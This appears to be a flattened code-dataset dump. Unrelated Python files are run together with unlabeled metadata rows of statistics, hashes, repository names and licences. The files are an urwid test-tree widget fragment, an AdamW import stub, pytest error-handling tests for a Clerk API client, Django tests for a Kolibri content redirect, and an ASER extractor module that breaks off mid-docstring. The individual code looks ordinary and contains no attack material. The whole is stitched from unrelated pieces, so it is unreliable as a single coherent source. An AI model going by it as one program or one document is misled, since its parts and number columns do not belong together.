return key
def update_w(self):
"""Update the attributes of self.widget based on self.flagged.
"""
node = self.get_node()
if node.flagged:
if node.all_flagged:
icon = "x"
elif node.any_flagged:
icon = "~"
else:
raise ValueError()
self.selected_w.set_text("[%s]" % icon)
else:
self.selected_w.set_text("[ ]")
class TestSuiteNode(urwid.ParentNode):
def __init__(self, *args, flagged=False, **kwargs):
super().__init__(*args, **kwargs)
self.flagged = flagged
self.all_flagged = False
self.any_flagged = False
def load_widget(self):
return TestSuiteWidget(self)
def load_child_keys(self):
data = self.get_value()
return sorted(data.get_test_files())
def set_flag(self, flag):
self.flagged = flag
for child_key in self.get_child_keys():
child = self.get_child_node(child_key)
child.set_flag(flag)
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
def check_flag(self):
data = self.get_value()
tests = data.get_tests_name()
stests = set()
for test in tests:
stests.add((self.get_value(), test))
self.all_flagged = stests.issubset(SELECTED_TEST)
self.any_flagged = not stests.isdisjoint(SELECTED_TEST)
if self.all_flagged or self.any_flagged:
self.flagged = True
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
if not self.any_flagged:
self.flagged = False
self.get_widget().update_w()
if hasattr(self.get_parent(), "check_flag"):
self.get_parent().check_flag()
def toggle_flag(self):
self.set_flag(not self.flagged)
def load_child_node(self, key):
data = self.get_value()
child_class = TestFileNode
return child_class(
data, parent=self, key=key, depth=self.get_depth() + 1, flagged=self.flagged
)
def refresh(self):
# signals.emit_signal(self.get_widget(), "modified")
self._child_keys = None
self.check_flag()
for child_key in self.get_child_keys():
child = self.get_child_node(child_key)
child.refresh()
class RootTreeWidget(urwid.TreeWidget):
""" Display widget for leaf nodes """
def get_display_text(self):
return "Tests"
class RootParentNode(urwid.ParentNode):
def load_widget(self):
return RootTreeWidget(self)
def load_child_keys(self):
data = self.get_value()
return list(data.get_test_suites())
def load_child_node(self, key):
data = self.get_value()
suite = data.suites[key]
return TestSuiteNode(suite, parent=self, key=key, depth=self.get_depth() + 1)
def refresh(self):
# signals.emit_signal(self.get_widget(), "modified")
self._child_keys = None
for child_key in self.get_child_keys():
child = self.get_child_node(child_key)
child.refresh()
| 28.226872
| 88
| 0.591182
| 1,559
| 12,815
| 4.62925
| 0.117383
| 0.059166
| 0.023417
| 0.032423
| 0.75918
| 0.747818
| 0.730913
| 0.726895
| 0.709436
| 0.698767
| 0
| 0.002619
| 0.284822
| 12,815
| 453
| 89
| 28.289183
| 0.784397
| 0.07936
| 0
| 0.729032
| 0
| 0
| 0.061744
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164516
| false
| 0.006452
| 0.012903
| 0.035484
| 0.303226
| 0.003226
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90bd0f7b8b08db4cb8e94533fd4b340cb7aa38da
| 26
|
py
|
Python
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 144
|
2020-08-06T02:18:49.000Z
|
2022-03-16T23:03:56.000Z
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 26
|
2020-08-12T01:07:48.000Z
|
2022-01-11T16:28:08.000Z
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 55
|
2020-08-13T03:00:17.000Z
|
2022-03-28T06:38:08.000Z
|
from .AdamW import AdamW
| 8.666667
| 24
| 0.769231
| 4
| 26
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 26
| 2
| 25
| 13
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
90deeb453f569ec9ed42914674d68873f513d8f1
| 3,694
|
py
|
Python
|
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
import pytest
from clerk import errors, types
@pytest.mark.asyncio
class TestAPIErrorHandling:
def _check_error(self, e: errors.ClerkAPIException, err):
assert e.status == 400
assert e.method is not None
assert e.url is not None
assert e.api_errors == (err,)
async def test_sessions_service_handles_errors(self, client, httpserver, server_400_error):
httpserver.expect_request("/sessions/", "GET").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/sessions/123/", "GET").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/sessions/123/revoke/", "POST").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/sessions/123/verify/", "POST").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
with pytest.raises(errors.ClerkAPIException) as e:
await client.session.list()
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.session.get("123")
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.session.revoke("123")
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.session.verify("123", "x")
self._check_error(e.value, server_400_error)
async def test_users_service_handles_errors(self, client, httpserver, server_400_error):
httpserver.expect_request("/users/", "GET").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/users/123/").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
with pytest.raises(errors.ClerkAPIException) as e:
await client.users.list()
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.users.get("123")
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.users.delete("123")
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.users.update("123", types.UpdateUserRequest())
self._check_error(e.value, server_400_error)
async def test_clients_service_handles_errors(self, client, httpserver, server_400_error):
httpserver.expect_request("/clients/", "GET").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/clients/123/", "GET").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
httpserver.expect_request("/clients/verify/", "POST").respond_with_json(
{"errors": [server_400_error.dict()]}, status=400
)
with pytest.raises(errors.ClerkAPIException) as e:
await client.clients.list()
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.clients.get("123")
self._check_error(e.value, server_400_error)
with pytest.raises(errors.ClerkAPIException) as e:
await client.clients.verify("token")
self._check_error(e.value, server_400_error)
| 36.574257
| 95
| 0.654034
| 442
| 3,694
| 5.217195
| 0.131222
| 0.089766
| 0.139636
| 0.104944
| 0.870772
| 0.856895
| 0.856895
| 0.856895
| 0.842151
| 0.842151
| 0
| 0.047137
| 0.224689
| 3,694
| 100
| 96
| 36.94
| 0.758031
| 0
| 0
| 0.430556
| 0
| 0
| 0.062263
| 0.01137
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.013889
| false
| 0
| 0.027778
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
294b05a0c139fd61f48237032e1f5ce23081086c
| 5,260
|
py
|
Python
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 545
|
2016-01-19T19:26:55.000Z
|
2022-03-20T00:13:04.000Z
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 8,329
|
2016-01-19T19:32:02.000Z
|
2022-03-31T21:23:12.000Z
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 493
|
2016-01-19T19:26:48.000Z
|
2022-03-28T14:35:05.000Z
|
import uuid
from django.core.urlresolvers import reverse
from django.test import TestCase
from mock import patch
from six.moves.urllib.parse import urlencode
from kolibri.core.content.models import ContentNode
class RedirectContentTestCase(TestCase):
"""
Testcase for viewcontent endpoint
"""
fixtures = ["content_test.json"]
the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
def _get_url(self, **kwargs):
url = reverse("kolibri:core:contentpermalink")
if any(kwargs.values()):
url += "?"
url += urlencode({k: v for k, v in kwargs.items() if v is not None})
return url
def test_no_params_404(self):
response = self.client.get(self._get_url())
self.assertEqual(response.status_code, 404)
def test_node_id_only_valid(self):
node_id = ContentNode.objects.first().id
response = self.client.get(self._get_url(node_id=node_id))
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
self.assertTrue(node_id in response.url)
def test_node_id_only_invalid(self):
response = self.client.get(self._get_url(node_id="rubbish"))
self.assertEqual(response.status_code, 404)
def test_node_id_and_content_id_valid(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(node_id=node.id, content_id=node.content_id)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
self.assertTrue(node.id in response.url)
def test_node_id_and_content_id_and_channel_id_valid(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(
node_id=node.id, content_id=node.content_id, channel_id=node.channel_id
)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
self.assertTrue(node.id in response.url)
def test_node_id_missing_and_content_id_and_channel_id_valid(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(
node_id=uuid.uuid4().hex,
content_id=node.content_id,
channel_id=node.channel_id,
)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
# Can make this assertion because this node is unique
self.assertTrue(node.id in response.url)
def test_node_id_missing_and_content_id_valid_and_channel_id_missing(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(
node_id=uuid.uuid4().hex,
content_id=node.content_id,
channel_id=uuid.uuid4().hex,
)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
# Can make this assertion because this node is unique
self.assertTrue(node.id in response.url)
def test_node_id_missing_and_content_id_missing_and_channel_id_missing(self):
response = self.client.get(
self._get_url(
node_id=uuid.uuid4().hex,
content_id=uuid.uuid4().hex,
channel_id=uuid.uuid4().hex,
)
)
self.assertEqual(response.status_code, 404)
def test_node_id_invalid_and_content_id_and_channel_id_valid(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(
node_id="rubbish",
content_id=node.content_id,
channel_id=node.channel_id,
)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
# Can make this assertion because this node is unique
self.assertTrue(node.id in response.url)
def test_node_id_invalid_and_content_id_valid_and_channel_id_invalid(self):
node = ContentNode.objects.first()
response = self.client.get(
self._get_url(
node_id="rubbish", content_id=node.content_id, channel_id="rubbish"
)
)
self.assertEqual(response.status_code, 302)
# This is true for our default learn urls for now.
# Can make this assertion because this node is unique
self.assertTrue(node.id in response.url)
def test_node_id_invalid_and_content_id_invalid_and_channel_id_invalid(self):
response = self.client.get(
self._get_url(node_id="rubbish", content_id="rubbish", channel_id="rubbish")
)
self.assertEqual(response.status_code, 404)
def test_node_id_only_valid_no_hooks_404(self):
node_id = ContentNode.objects.first().id
with patch("kolibri.core.content.views.ContentNodeDisplayHook") as hook_mock:
hook_mock.registered_hooks.return_value = []
response = self.client.get(self._get_url(node_id=node_id))
self.assertEqual(response.status_code, 404)
| 38.394161
| 88
| 0.65076
| 686
| 5,260
| 4.72449
| 0.129738
| 0.064795
| 0.066646
| 0.077754
| 0.814872
| 0.799753
| 0.798828
| 0.763653
| 0.746375
| 0.746375
| 0
| 0.017015
| 0.262548
| 5,260
| 136
| 89
| 38.676471
| 0.81851
| 0.111217
| 0
| 0.5
| 0
| 0
| 0.038073
| 0.023661
| 0
| 0
| 0
| 0
| 0.182692
| 1
| 0.125
| false
| 0
| 0.057692
| 0
| 0.221154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2950e2d6496ab5c04db14e9a7b1fdb1a9afd9f23
| 56,354
|
py
|
Python
|
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
from copy import copy, deepcopy
from itertools import chain
from .eventuality_extractor import SeedRuleEventualityExtractor, DiscourseEventualityExtractor
from .relation_extractor import SeedRuleRelationExtractor, DiscourseRelationExtractor
from .utils import parse_sentense_with_stanford, get_corenlp_client
from .utils import ANNOTATORS
class BaseASERExtractor(object):
""" Base ASER Extractor to extract both eventualities and relations.
It includes an instance of `BaseEventualityExtractor` and an instance of `BaseRelationExtractor`.
"""
def __init__(self, corenlp_path="", corenlp_port=0, **kw):
"""
:param corenlp_path: corenlp path, e.g., /home/xliucr/stanford-corenlp-3.9.2
:type corenlp_path: str (default = "")
:param corenlp_port: corenlp port, e.g., 9000
:type corenlp_port: int (default = 0)
:param kw: other parameters
:type kw: Dict[str, object]
"""
self.corenlp_path = corenlp_path
self.corenlp_port = corenlp_port
self.annotators = kw.get("annotators", list(ANNOTATORS))
_, self.is_externel_corenlp = get_corenlp_client(corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port)
self.eventuality_extractor = None
self.relation_extractor = None
def close(self):
""" Close the extractor safely
"""
if not self.is_externel_corenlp:
corenlp_client, _ = get_corenlp_client(corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port)
corenlp_client.stop()
if self.eventuality_extractor:
self.eventuality_extractor.close()
if self.relation_extractor:
self.relation_extractor.close()
def __del__(self):
self.close()
def parse_text(self, text, annotators=None):
""" Parse a raw text by corenlp
:param text: a raw text
:type text: str
:param annotators: annotators for corenlp, please refer to https://stanfordnlp.github.io/CoreNLP/annotators.html
:type annotators: Union[List, None] (default = None)
:return: the parsed result
:rtype: List[Dict[str, object]]
.. highlight:: python
.. code-block:: python
Input:
"My army will find your boat. In the meantime, I'm sure we could find you suitable accommodations."
Output:
[{'dependencies': [(1, 'nmod:poss', 0),
(3, 'nsubj', 1),
(3, 'aux', 2),
(3, 'dobj', 5),
(3, 'punct', 6),
(5, 'nmod:poss', 4)],
'lemmas': ['my', 'army', 'will', 'find', 'you', 'boat', '.'],
'mentions': [],
'ners': ['O', 'O', 'O', 'O', 'O', 'O', 'O'],
'parse': '(ROOT (S (NP (PRP$ My) (NN army)) (VP (MD will) (VP (VB find) (NP '
'(PRP$ your) (NN boat)))) (. .)))',
'pos_tags': ['PRP$', 'NN', 'MD', 'VB', 'PRP$', 'NN', '.'],
'text': 'My army will find your boat.',
'tokens': ['My', 'army', 'will', 'find', 'your', 'boat', '.']},
{'dependencies': [(2, 'case', 0),
(2, 'det', 1),
(6, 'nmod:in', 2),
(6, 'punct', 3),
(6, 'nsubj', 4),
(6, 'cop', 5),
(6, 'ccomp', 9),
(6, 'punct', 13),
(9, 'nsubj', 7),
(9, 'aux', 8),
(9, 'iobj', 10),
(9, 'dobj', 12),
(12, 'amod', 11)],
'lemmas': ['in',
'the',
'meantime',
',',
'I',
'be',
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodation',
'.'],
'mentions': [],
'ners': ['O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O'],
'parse': '(ROOT (S (PP (IN In) (NP (DT the) (NN meantime))) (, ,) (NP (PRP '
"I)) (VP (VBP 'm) (ADJP (JJ sure) (SBAR (S (NP (PRP we)) (VP (MD "
'could) (VP (VB find) (NP (PRP you)) (NP (JJ suitable) (NNS '
'accommodations)))))))) (. .)))',
'pos_tags': ['IN',
'DT',
'NN',
',',
'PRP',
'VBP',
'JJ',
'PRP',
'MD',
'VB',
'PRP',
'JJ',
'NNS',
'.'],
'text': "In the meantime, I'm sure we could find you suitable "
'accommodations.',
'tokens': ['In',
'the',
'meantime',
',',
'I',
"'m",
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodations',
'.']}]
"""
if annotators is None:
annotators = self.annotators
corenlp_client, _ = get_corenlp_client(
corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port, annotators=annotators
)
parsed_result = parse_sentense_with_stanford(text, corenlp_client, self.annotators)
return parsed_result
def extract_eventualities_from_parsed_result(self, parsed_result, output_format="Eventuality", in_order=True, **kw):
""" Extract eventualities from the parsed result
:param parsed_result: the parsed result returned by corenlp
:type parsed_result: List[Dict[str, object]]
:param output_format: which format to return, "Eventuality" or "json"
:type output_format: str (default = "Eventuality")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted eventualities
:rtype: Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]]
.. highlight:: python
.. code-block:: python
Input:
[{'dependencies': [(1, 'nmod:poss', 0),
(3, 'nsubj', 1),
(3, 'aux', 2),
(3, 'dobj', 5),
(3, 'punct', 6),
(5, 'nmod:poss', 4)],
'lemmas': ['my', 'army', 'will', 'find', 'you', 'boat', '.'],
'mentions': [],
'ners': ['O', 'O', 'O', 'O', 'O', 'O', 'O'],
'parse': '(ROOT (S (NP (PRP$ My) (NN army)) (VP (MD will) (VP (VB find) (NP '
'(PRP$ your) (NN boat)))) (. .)))',
'pos_tags': ['PRP$', 'NN', 'MD', 'VB', 'PRP$', 'NN', '.'],
'text': 'My army will find your boat.',
'tokens': ['My', 'army', 'will', 'find', 'your', 'boat', '.']},
{'dependencies': [(2, 'case', 0),
(2, 'det', 1),
(6, 'nmod:in', 2),
(6, 'punct', 3),
(6, 'nsubj', 4),
(6, 'cop', 5),
(6, 'ccomp', 9),
(6, 'punct', 13),
(9, 'nsubj', 7),
(9, 'aux', 8),
(9, 'iobj', 10),
(9, 'dobj', 12),
(12, 'amod', 11)],
'lemmas': ['in',
'the',
'meantime',
',',
'I',
'be',
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodation',
'.'],
'mentions': [],
'ners': ['O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O'],
'parse': '(ROOT (S (PP (IN In) (NP (DT the) (NN meantime))) (, ,) (NP (PRP '
"I)) (VP (VBP 'm) (ADJP (JJ sure) (SBAR (S (NP (PRP we)) (VP (MD "
'could) (VP (VB find) (NP (PRP you)) (NP (JJ suitable) (NNS '
'accommodations)))))))) (. .)))',
'pos_tags': ['IN',
'DT',
'NN',
',',
'PRP',
'VBP',
'JJ',
'PRP',
'MD',
'VB',
'PRP',
'JJ',
'NNS',
'.'],
'text': "In the meantime, I'm sure we could find you suitable "
'accommodations.',
'tokens': ['In',
'the',
'meantime',
',',
'I',
"'m",
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodations',
'.']}]
Output:
[[my army will find you boat],
[i be sure, we could find you suitable accommodation]]
"""
if output_format not in ["Eventuality", "json"]:
raise ValueError(
"Error: extract_eventualities_from_parsed_result only supports Eventuality or json."
)
return self.eventuality_extractor.extract_from_parsed_result(
parsed_result, output_format=output_format, in_order=in_order, **kw
)
def extract_eventualities_from_text(self, text, output_format="Eventuality", in_order=True, annotators=None, **kw):
""" Extract eventualities from a raw text
:param text: a raw text
:type text: str
:param output_format: which format to return, "Eventuality" or "json"
:type output_format: str (default = "Eventuality")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param annotators: annotators for corenlp, please refer to https://stanfordnlp.github.io/CoreNLP/annotators.html
:type annotators: Union[List, None] (default = None)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted eventualities
:rtype: Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]]
.. highlight:: python
.. code-block:: python
Input:
"My army will find your boat. In the meantime, I'm sure we could find you suitable accommodations."
Output:
[[my army will find you boat],
[i be sure, we could find you suitable accommodation]]
"""
if output_format not in ["Eventuality", "json"]:
raise NotImplementedError("Error: extract_eventualities_from_text only supports Eventuality or json.")
parsed_result = self.parse_text(text, annotators=annotators)
return self.extract_eventualities_from_parsed_result(
parsed_result, output_format=output_format, in_order=in_order, **kw
)
def extract_relations_from_parsed_result(
self, parsed_result, para_eventualities, output_format="Relation", in_order=True, **kw
):
""" Extract relations from a parsed result (of a paragraph) and extracted eventualities
:param parsed_result: the parsed result returned by corenlp
:type parsed_result: List[Dict[str, object]]
:param para_eventualities: eventualities in the paragraph
:type para_eventualities: List[aser.eventuality.Eventuality]
:param output_format: which format to return, "Relation" or "triplet"
:type output_format: str (default = "Relation")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted relations
:rtype: Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]
.. highlight:: python
.. code-block:: python
Input:
[{'dependencies': [(1, 'nmod:poss', 0),
(3, 'nsubj', 1),
(3, 'aux', 2),
(3, 'dobj', 5),
(3, 'punct', 6),
(5, 'nmod:poss', 4)],
'lemmas': ['my', 'army', 'will', 'find', 'you', 'boat', '.'],
'mentions': [],
'ners': ['O', 'O', 'O', 'O', 'O', 'O', 'O'],
'parse': '(ROOT (S (NP (PRP$ My) (NN army)) (VP (MD will) (VP (VB find) (NP '
'(PRP$ your) (NN boat)))) (. .)))',
'pos_tags': ['PRP$', 'NN', 'MD', 'VB', 'PRP$', 'NN', '.'],
'text': 'My army will find your boat.',
'tokens': ['My', 'army', 'will', 'find', 'your', 'boat', '.']},
{'dependencies': [(2, 'case', 0),
(2, 'det', 1),
(6, 'nmod:in', 2),
(6, 'punct', 3),
(6, 'nsubj', 4),
(6, 'cop', 5),
(6, 'ccomp', 9),
(6, 'punct', 13),
(9, 'nsubj', 7),
(9, 'aux', 8),
(9, 'iobj', 10),
(9, 'dobj', 12),
(12, 'amod', 11)],
'lemmas': ['in',
'the',
'meantime',
',',
'I',
'be',
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodation',
'.'],
'mentions': [],
'ners': ['O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O'],
'parse': '(ROOT (S (PP (IN In) (NP (DT the) (NN meantime))) (, ,) (NP (PRP '
"I)) (VP (VBP 'm) (ADJP (JJ sure) (SBAR (S (NP (PRP we)) (VP (MD "
'could) (VP (VB find) (NP (PRP you)) (NP (JJ suitable) (NNS '
'accommodations)))))))) (. .)))',
'pos_tags': ['IN',
'DT',
'NN',
',',
'PRP',
'VBP',
'JJ',
'PRP',
'MD',
'VB',
'PRP',
'JJ',
'NNS',
'.'],
'text': "In the meantime, I'm sure we could find you suitable "
'accommodations.',
'tokens': ['In',
'the',
'meantime',
',',
'I',
"'m",
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodations',
'.']}],
[[my army will find you boat],
[i be sure, we could find you suitable accommodation]]
Output:
[[],
[(7d9ea9023b66a0ebc167f0dbb6ea8cd75d7b46f9, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Co_Occurrence': 1.0})],
[(8540897b645962964fd644242d4cc0032f024e86, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Synchronous': 1.0})]]
"""
if output_format not in ["Relation", "triplet"]:
raise NotImplementedError("Error: extract_relations_from_parsed_result only supports Relation or triplet.")
return self.relation_extractor.extract_from_parsed_result(
parsed_result, para_eventualities, output_format=output_format, in_order=in_order, **kw
)
def extract_relations_from_text(self, text, output_format="Relation", in_order=True, annotators=None, **kw):
""" Extract relations from a raw text and extracted eventualities
:param text: a raw text
:type text: str
:param output_format: which format to return, "Relation" or "triplet"
:type output_format: str (default = "Relation")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param annotators: annotators for corenlp, please refer to https://stanfordnlp.github.io/CoreNLP/annotators.html
:type annotators: Union[List, None] (default = None)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted relations
:rtype: Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]
.. highlight:: python
.. code-block:: python
Input:
"My army will find your boat. In the meantime, I'm sure we could find you suitable accommodations."
Output:
[[],
[(7d9ea9023b66a0ebc167f0dbb6ea8cd75d7b46f9, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Co_Occurrence': 1.0})],
[(8540897b645962964fd644242d4cc0032f024e86, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Synchronous': 1.0})]]
"""
if output_format not in ["Relation", "triplet"]:
raise NotImplementedError("Error: extract_relations_from_text only supports Relation or triplet.")
parsed_result = self.parse_text(text, annotators=annotators)
para_eventualities = self.extract_eventualities_from_parsed_result(parsed_result)
return self.extract_relations_from_parsed_result(
parsed_result, para_eventualities, output_format=output_format, in_order=in_order, **kw
)
def extract_from_parsed_result(
self,
parsed_result,
eventuality_output_format="Eventuality",
relation_output_format="Relation",
in_order=True,
**kw
):
""" Extract both eventualities and relations from a parsed result
:param parsed_result: the parsed result returned by corenlp
:type parsed_result: List[Dict[str, object]]
:param eventuality_output_format: which format to return eventualities, "Eventuality" or "json"
:type eventuality_output_format: str (default = "Eventuality")
:param relation_output_format: which format to return relations, "Relation" or "triplet"
:type relation_output_format: str (default = "Relation")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted eventualities and relations
:rtype: Tuple[Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]], Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]]
.. highlight:: python
.. code-block:: python
Input:
[{'dependencies': [(1, 'nmod:poss', 0),
(3, 'nsubj', 1),
(3, 'aux', 2),
(3, 'dobj', 5),
(3, 'punct', 6),
(5, 'nmod:poss', 4)],
'lemmas': ['my', 'army', 'will', 'find', 'you', 'boat', '.'],
'mentions': [],
'ners': ['O', 'O', 'O', 'O', 'O', 'O', 'O'],
'parse': '(ROOT (S (NP (PRP$ My) (NN army)) (VP (MD will) (VP (VB find) (NP '
'(PRP$ your) (NN boat)))) (. .)))',
'pos_tags': ['PRP$', 'NN', 'MD', 'VB', 'PRP$', 'NN', '.'],
'text': 'My army will find your boat.',
'tokens': ['My', 'army', 'will', 'find', 'your', 'boat', '.']},
{'dependencies': [(2, 'case', 0),
(2, 'det', 1),
(6, 'nmod:in', 2),
(6, 'punct', 3),
(6, 'nsubj', 4),
(6, 'cop', 5),
(6, 'ccomp', 9),
(6, 'punct', 13),
(9, 'nsubj', 7),
(9, 'aux', 8),
(9, 'iobj', 10),
(9, 'dobj', 12),
(12, 'amod', 11)],
'lemmas': ['in',
'the',
'meantime',
',',
'I',
'be',
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodation',
'.'],
'mentions': [],
'ners': ['O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O',
'O'],
'parse': '(ROOT (S (PP (IN In) (NP (DT the) (NN meantime))) (, ,) (NP (PRP '
"I)) (VP (VBP 'm) (ADJP (JJ sure) (SBAR (S (NP (PRP we)) (VP (MD "
'could) (VP (VB find) (NP (PRP you)) (NP (JJ suitable) (NNS '
'accommodations)))))))) (. .)))',
'pos_tags': ['IN',
'DT',
'NN',
',',
'PRP',
'VBP',
'JJ',
'PRP',
'MD',
'VB',
'PRP',
'JJ',
'NNS',
'.'],
'text': "In the meantime, I'm sure we could find you suitable "
'accommodations.',
'tokens': ['In',
'the',
'meantime',
',',
'I',
"'m",
'sure',
'we',
'could',
'find',
'you',
'suitable',
'accommodations',
'.']}],
[[my army will find you boat],
[i be sure, we could find you suitable accommodation]]
Output:
([[my army will find you boat],
[i be sure, we could find you suitable accommodation]],
[[],
